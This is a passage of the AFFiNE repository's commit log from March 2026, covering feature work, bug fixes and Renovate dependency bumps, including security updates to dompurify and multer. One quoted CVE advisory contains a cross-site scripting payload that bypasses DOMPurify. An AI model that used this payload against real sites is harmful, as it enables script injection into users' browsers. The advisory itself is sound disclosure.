\[[`c2ba56d6b2`](https://redirect.github.com/nodejs/node/commit/c2ba56d6b2)]
- **src,permission**: fix permission.has on empty param (Rafael Gonzaga)
[#&#8203;60674](https://redirect.github.com/nodejs/node/pull/60674)
-
\[[`e55a2b895a`](https://redirect.github.com/nodejs/node/commit/e55a2b895a)]
- **src,permission**: add debug log on is\_tree\_granted (Rafael
Gonzaga)
[#&#8203;60668](https://redirect.github.com/nodejs/node/pull/60668)
-
\[[`902a78b43c`](https://redirect.github.com/nodejs/node/commit/902a78b43c)]
- **stream**: fix isErrored/isWritable for WritableStreams (René)
[#&#8203;60905](https://redirect.github.com/nodejs/node/pull/60905)
-
\[[`221b77cf41`](https://redirect.github.com/nodejs/node/commit/221b77cf41)]
- **stream**: don't try to read more if reading (Robert Nagy)
[#&#8203;60454](https://redirect.github.com/nodejs/node/pull/60454)
-
\[[`46d12d826f`](https://redirect.github.com/nodejs/node/commit/46d12d826f)]
- **test**: skip strace test with shared openssl (Richard Lau)
[#&#8203;61987](https://redirect.github.com/nodejs/node/pull/61987)
-
\[[`52e6b01a44`](https://redirect.github.com/nodejs/node/commit/52e6b01a44)]
- **test**: mark `test-strace-openat-openssl` as flaky (Antoine du
Hamel)
[#&#8203;61921](https://redirect.github.com/nodejs/node/pull/61921)
-
\[[`4d7468d0e0`](https://redirect.github.com/nodejs/node/commit/4d7468d0e0)]
- **test**: skip --build-sea tests on platforms where SEA is flaky
(Joyee Cheung)
[#&#8203;61504](https://redirect.github.com/nodejs/node/pull/61504)
-
\[[`f604b7ae67`](https://redirect.github.com/nodejs/node/commit/f604b7ae67)]
- **test**: fix flaky debugger test (Ryuhei Shima)
[#&#8203;58324](https://redirect.github.com/nodejs/node/pull/58324)
-
\[[`fc2dc4024b`](https://redirect.github.com/nodejs/node/commit/fc2dc4024b)]
- **test**: ensure removeListener event fires for once() listeners
(sangwook)
[#&#8203;60137](https://redirect.github.com/nodejs/node/pull/60137)
-
\[[`5fba382816`](https://redirect.github.com/nodejs/node/commit/5fba382816)]
- **test**: delay writing the files only on macOS (Luigi Pinca)
[#&#8203;61532](https://redirect.github.com/nodejs/node/pull/61532)
- \[[`85cc9e20e4`](https://red

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-09 18:16:47 +08:00
Kenneth Wußmann 0b47f92134 fix(oidc): allow string boolean in email_verified userinfo schema (#14609)
## Why

When using AWS Cognito as OIDC provider, AFFiNE returns a zod parsing
error because AWS returns `email_verified` as a string in the userinfo
response.

```json
{
    "sub": "[UUID]",
    "email_verified": "true",
    "custom:mycustom1": "CustomValue",
    "phone_number_verified": "true",
    "phone_number": "+12065551212",
    "email": "bob@example.com",
    "username": "bob"
}
```

Reference:
https://docs.aws.amazon.com/cognito/latest/developerguide/userinfo-endpoint.html#get-userinfo-response-sample

Error returned in AFFiNE frontend:
```
Validation error, errors: [ { "code": "invalid_type", "expected": "boolean", "received": "string", "path": [ "email_verified" ], "message": "Expected boolean, received string" } ]
```

## What

I'm adjusting the existing `OIDCUserInfoSchema` to allow `z.boolean()`
and `z.enum(['true', 'false', '0', '1', 'yes', 'no'])`.
This matches with [our `extractBoolean` function in the
`OIDCProvider`](https://github.com/KennethWussmann/AFFiNE/blob/82e6239957db5f3754cde8ad968db62bc4ffad6a/packages/backend/server/src/plugins/oauth/providers/oidc.ts#L269-L285),
which already parses string as booleans in `email_verified`. But because
the userinfo response is parsed with zod first, it's failing before
reaching our `extractBoolean`.

> [!NOTE]
> We are using zod v3. In zod v4 they [added support for
`z.stringbool()`](https://zod.dev/api?id=stringbool) which would make
this easier.


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Enhanced OpenID Connect provider authentication to accept flexible
formats for email verification status, including various string
representations alongside boolean values.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-09 02:53:43 +00:00
DarkSky 9c55edeb62 feat(server): adapt gemini3.1 preview (#14583)
#### PR Dependency Tree


* **PR #14583** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added Gemini 3.1 Pro Preview support (text, image, audio) and new
GPT‑5 variants as defaults; centralized persistent telemetry state for
more reliable client identity.

* **UX**
  * Improved model submenu placement in chat preferences.
* More robust mindmap parsing, preview, regeneration and replace
behavior.

* **Chores**
  * Bumped AI SDK and related dependencies.

* **Tests**
  * Expanded/updated tests and increased timeouts for flaky flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-08 00:53:16 +08:00
DarkSky 9742e9735e feat(editor): improve edgeless perf & memory usage (#14591)
#### PR Dependency Tree


* **PR #14591** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* New canvas renderer debug metrics and controls for runtime inspection.
* Mindmap/group reordering now normalizes group targets, improving
reorder consistency.

* **Bug Fixes**
  * Fixed connector behavior for empty/degenerate paths.
* More aggressive viewport invalidation so structural changes display
correctly.
* Improved z-index synchronization during transforms and layer updates.

* **Performance**
* Retained DOM caching for brushes, shapes, and connectors to reduce DOM
churn.
* Targeted canvas refreshes, pooling, and reuse to lower redraw and
memory overhead.

* **Tests**
* Added canvas renderer performance benchmarks and curve edge-case unit
tests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 09:12:14 +08:00
DarkSky 86d65b2f64 feat(server): add image resize support (#14588)
fix #13842 


#### PR Dependency Tree


* **PR #14588** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Images are now processed natively and converted to WebP for smaller,
optimized files; Copilot and avatar attachments use the processed WebP
output.
* Avatar uploads accept BMP, GIF, JPEG, PNG, WebP (5MB max) and are
downscaled to a standard edge.

* **Error Messages / i18n**
  * Added localized error "Image format not supported: {format}".

* **Tests**
* Added end-to-end and unit tests for conversion, EXIF preservation, and
upload limits.

* **Chores**
  * Added native image-processing dependencies.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 04:42:12 +08:00
DarkSky f34e25e122 test: migrate test & utils (#14569)
#### PR Dependency Tree


* **PR #14569** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Upgraded development test tooling to Vitest v4 and added Playwright
browser test integration; normalized test configurations and CI shard
matrix.

* **Tests**
* Added a large suite of new integration tests covering editor flows
(edgeless, database, embeds, images, latex, code, clipboard,
multi-editor, presentation, undo/redo, etc.).
* Removed numerous end-to-end Playwright test suites across the same
feature areas.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 04:12:27 +08:00
DarkSky b5d5b71f95 feat(server): improve markdown parse (#14580)
#### PR Dependency Tree


* **PR #14580** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Markdown conversion now reports lists of known-unsupported and unknown
block identifiers encountered during parsing, and separates them from
the main markdown output.

* **Bug Fixes**
  * Improved error handling and logging around markdown parsing.

* **Tests**
* Updated tests and snapshots to reflect the new block-list fields and
the adjusted markdown output.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 00:14:27 +08:00
renovate[bot] 09fa1a8e4e chore: bump up dompurify version to v3.3.2 [SECURITY] (#14581)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.0` →
`3.3.2`](https://renovatebot.com/diffs/npm/dompurify/3.3.0/3.3.2) |
![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.3.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.0/3.3.2?slim=true)
|

### GitHub Vulnerability Alerts

#### [CVE-2026-0540](https://nvd.nist.gov/vuln/detail/CVE-2026-0540)

DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in 2.5.9
and 3.3.2, contain a cross-site scripting vulnerability that allows
attackers to bypass attribute sanitization by exploiting five missing
rawtext elements (noscript, xmp, noembed, noframes, iframe) in the
`SAFE_FOR_XML` regex. Attackers can include payloads like
`</noscript><img src=x onerror=alert(1)>` in attribute values to execute
JavaScript when sanitized output is placed inside these unprotected
rawtext contexts.

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.3.2`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.2):
DOMPurify 3.3.2

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.1...3.3.2)

- Fixed a possible bypass caused by jsdom's faulty raw-text tag parsing,
thanks multiple reporters
- Fixed a prototype pollution issue when working with custom elements,
thanks [@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Fixed a lenient config parsing in `_isValidAttribute`, thanks
[@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Bumped and removed several dependencies, thanks
[@&#8203;Rotzbua](https://redirect.github.com/Rotzbua)
- Fixed the test suite after bumping dependencies, thanks
[@&#8203;Rotzbua](https://redirect.github.com/Rotzbua)

###
[`v3.3.1`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.1):
DOMPurify 3.3.1

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.0...3.3.1)

- Updated `ADD_FORBID_CONTENTS` setting to extend default list, thanks
[@&#8203;MariusRumpf](https://redirect.github.com/MariusRumpf)
- Updated the ESM import syntax to be more correct, thanks
[@&#8203;binhpv](https://redirect.github.com/binhpv)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41Ni4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTYuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 19:04:08 +08:00
congzhou09 c249011238 fix(editor): note-edgeless-block dimensions mismatch content at non-100% scale (#14577)
### Problem
●In edgeless mode, when the `note-edgeless-block` is scaled below 100%,
its outer dimension becomes larger than its content region. This extra
invisible region will block some user interactions such as clicks and
hovers on editing elements underneath.

<img width="1060" height="541" alt="note-elem-block-click"
src="https://github.com/user-attachments/assets/860d7a4f-d159-437b-bbe8-4560e2463e3d"
/>

●The following video demonstrates this issue:


https://github.com/user-attachments/assets/3b719b25-0d7e-496b-9507-6aa65ed0a797


### Solution
●The root cause is that `transform: scale(...)` CSS property (which
implements the scale) is currently applyed to its **inner root element**
instead of itself, and the solution is to move this CSS property to the
proper place.

### After
●The video below shows the behavior after this fix.



https://github.com/user-attachments/assets/e2dbd75d-c2ea-460d-90a1-5cc13e12d5b8



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Centralized CSS scaling for graphics and edgeless note blocks into
dedicated public methods; rendering now uses these methods instead of
inline transform calculations.
* **Tests**
* Updated end-to-end checks to read scale directly from the edgeless
note element and use a more flexible transform-matching pattern.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-06 19:03:36 +08:00
DarkSky 7f5f7e79df feat(server): refactor mcp (#14579)
#### PR Dependency Tree


* **PR #14579** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full JSON-RPC MCP endpoint with batch requests, per-message
validation, method dispatch (initialize, ping, tools/list, tools/call)
and request cancellation
* Tool listing and execution with input validation, standardized
results, and improved error responses

* **Chores**
  * Removed an external protocol dependency
  * Bumped MCP server version to 1.0.1
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-06 06:35:34 +08:00
DarkSky fff04395bc chore: update docs 2026-03-06 01:51:09 +08:00
renovate[bot] bbc01533d7 chore: bump up multer version to v2.1.1 [SECURITY] (#14576)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.1.0` →
`2.1.1`](https://renovatebot.com/diffs/npm/multer/2.1.0/2.1.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.1.0/2.1.1?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3520](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2)

### Impact

A vulnerability in Multer versions < 2.1.1 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing stack overflow.

### Patches

Users should upgrade to `2.1.1`

### Workarounds

None

### Resources

-
https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
- https://www.cve.org/CVERecord?id=CVE-2026-3520
-
https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
- https://cna.openjsf.org/security-advisories.html

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

###
[`v2.1.1`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#211)

[Compare
Source](https://redirect.github.com/expressjs/multer/compare/v2.1.0...v2.1.1)

- Fix [CVE-2026-3520](https://www.cve.org/CVERecord?id=CVE-2026-3520)
([GHSA-5528-5vmv-3xc2](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2))
- fix error/abort handling

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41NS40IiwidXBkYXRlZEluVmVyIjoiNDMuNTUuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 01:04:48 +08:00
congzhou09 e31cca3354 fix(editor): non-canvas block size/position in embed-edgeless-doc at non-1 zoom (#14074)
### Problem
●Similar to
[PR#14015](https://github.com/toeverything/AFFiNE/pull/14015), the
container's own scaling factor (`viewScale`) was not taken into account.
This time the issue affects **non-canvas blocks** (e.g. `edgeless-note`,
`edgeless-image`, and any component extending `GfxBlockComponent`).
●The follwing image and video show the case when zoom is 0.5.

<img width="822" height="414" alt="图片"
src="https://github.com/user-attachments/assets/cee1cb88-2764-443c-aa7a-0443308b0e29"
/>


https://github.com/user-attachments/assets/3c744579-16c4-4f10-b421-e0606da1269f

### Solution
●Incorporated `viewScale` into the CSS `translate` calculation for all
`GfxBlockComponent` instances.

### Additional Improvement
●Minor refactor: the class returned by `toGfxBlockComponent()` now
reuses the original `getCSSTransform()` implementation from
`GfxBlockComponent.prototype` via `.call(this)`, eliminating duplicated
code.

### After
●The refined is as follows.


https://github.com/user-attachments/assets/24de0429-63a3-45a7-9b31-d91a4279e233


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Improved viewport scaling so visual transforms (translation and zoom)
correctly account for view scale, yielding more consistent rendering
during zoom and pan.
* Centralized transform calculation to a shared implementation, reducing
duplication and ensuring uniform behavior across views.

<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-03-04 11:38:09 +00:00
DarkSky 11bc333714 Merge commit '99b07c2ee14dea1383ca6cd63633c3df542f2955' into canary 2026-03-04 01:18:30 +08:00
DarkSky 99b07c2ee1 fix: ios marketing version 2026-03-04 01:17:14 +08:00
renovate[bot] fc9b99cd17 chore: bump up ava version to v7 (#14563)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ava](https://avajs.dev)
([source](https://redirect.github.com/avajs/ava)) | [`^6.4.1` →
`^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true)
|
| [ava](https://avajs.dev)
([source](https://redirect.github.com/avajs/ava)) | [`^6.4.0` →
`^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>avajs/ava (ava)</summary>

###
[`v7.0.0`](https://redirect.github.com/avajs/ava/releases/tag/v7.0.0)

[Compare
Source](https://redirect.github.com/avajs/ava/compare/v6.4.1...v7.0.0)

##### What's Changed

- Replace `strip-ansi` with `node:util.stripVTControlCharacters` by
[@&#8203;fisker](https://redirect.github.com/fisker) in
[#&#8203;3403](https://redirect.github.com/avajs/ava/pull/3403)
- Remove support for Node.js 18 and 23; require 20.19 or newer, 22.20 or
newer or 24,12 or newer; update dependencies including transitive `glob`
by [@&#8203;novemberborn](https://redirect.github.com/novemberborn) in
[#&#8203;3416](https://redirect.github.com/avajs/ava/pull/3416)

**Full Changelog**:
<https://github.com/avajs/ava/compare/v6.4.1...v7.0.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40OC4xIiwidXBkYXRlZEluVmVyIjoiNDMuNDguMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-03 17:47:47 +08:00
DarkSky 2137f68871 fix(server): normalize mail server name (#14564)
fix #14562 
fix #14226 
fix #14192


#### PR Dependency Tree


* **PR #14564** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* SMTP and fallback SMTP name now default to empty and will use the
system hostname when not set.
* HELO hostname resolution includes stricter normalization/validation
for more reliable mail handshakes.

* **Documentation**
* Updated admin and config descriptions to explain hostname/HELO
behavior and fallback.

* **Tests**
* Added tests covering hostname normalization and rejection of invalid
HELO values.

* **Chores**
  * Updated example env and ignore rules.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-03 15:51:32 +08:00
renovate[bot] 75efa854bf chore: bump up apple-actions/import-codesign-certs action to v6 (#14561)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
|
[apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs)
| action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>apple-actions/import-codesign-certs
(apple-actions/import-codesign-certs)</summary>

###
[`v6`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v5...v6)

[Compare
Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-03 12:14:10 +08:00
renovate[bot] c0139abf79 chore: bump up actions/setup-java action to v5 (#14554)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-java](https://redirect.github.com/actions/setup-java) |
action | major | `v4` → `v5` |

---

### Release Notes

<details>
<summary>actions/setup-java (actions/setup-java)</summary>

###
[`v5`](https://redirect.github.com/actions/setup-java/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/setup-java/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 20:31:47 +08:00
renovate[bot] 5a38e765bd chore: bump up actions/setup-node action to v6 (#14555)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-node](https://redirect.github.com/actions/setup-node) |
action | major | `v4` → `v6` |

---

### Release Notes

<details>
<summary>actions/setup-node (actions/setup-node)</summary>

###
[`v6`](https://redirect.github.com/actions/setup-node/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/setup-node/compare/v5...v6)

###
[`v5`](https://redirect.github.com/actions/setup-node/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/setup-node/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 20:31:23 +08:00
renovate[bot] d3dcdd47ee chore: bump up actions/setup-python action to v6 (#14556)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
|
[actions/setup-python](https://redirect.github.com/actions/setup-python)
| action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>actions/setup-python (actions/setup-python)</summary>

###
[`v6`](https://redirect.github.com/actions/setup-python/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/setup-python/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 20:31:01 +08:00
DarkSky 727c9d6d71 fix: server build env 2026-03-02 20:23:00 +08:00
DarkSky 274f491e49 fix: aarch64 build 2026-03-02 19:49:52 +08:00
congzhou09 478138493a fix(editor): invalid caret in note-edgeless-block on focus (#14229)
### Problem
●In edgeless mode, when starting to edit, `note-block` exhibits two
types of invalid caret behavior:
(1)**Title Region Misalignment**: Clicking on the title region
incorrectly generates the caret in the first line of the note content,
rather than in the title itself.
(2)**Vanishing Caret at Line End**: When clicking in the empty space
beyond the end of a text section, the caret appears momentarily at the
line's end but disappears immediately.
●The following video demonstrates these issues:


https://github.com/user-attachments/assets/db9c2c50-709f-4d32-912c-0f01841d2024


### Solution
●**Title Click Interception**: Added a check to determine if the click
coordinates fall in the title region. If so, the caret positioning is
now handled by a dedicated logic path. Otherwise, it falls back to the
existing note-content logic as before.
●**Range Normalization**: When the generated `range.startContainer` is
not a `TextNode`, try to find a most appropriate `TextNode` and update
the `range` accordingly.

### After
●The video below shows the behavior after this fix.


https://github.com/user-attachments/assets/b2f70b64-1fc6-4049-8379-8bcf3a488a05



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Clicking a page block title no longer creates unwanted paragraphs and
reliably focuses the title.
* Paragraph creation now occurs only when needed and focus is applied
only after successful creation.
* Click coordinates are clamped to container bounds to prevent misplaced
cursors or focus.

* **Improvements**
* Caret normalization: clicks place the caret at the last meaningful
text position for consistent single-cursor behavior.

* **Tests**
  * Added end-to-end coverage for caret placement and focus transitions.
* New ratio-based click/double-click test utilities and a helper for
double-clicking note bodies.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-02 18:51:23 +08:00
renovate[bot] 5464d1a9ce chore: bump up multer version to v2.1.0 [SECURITY] (#14544)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
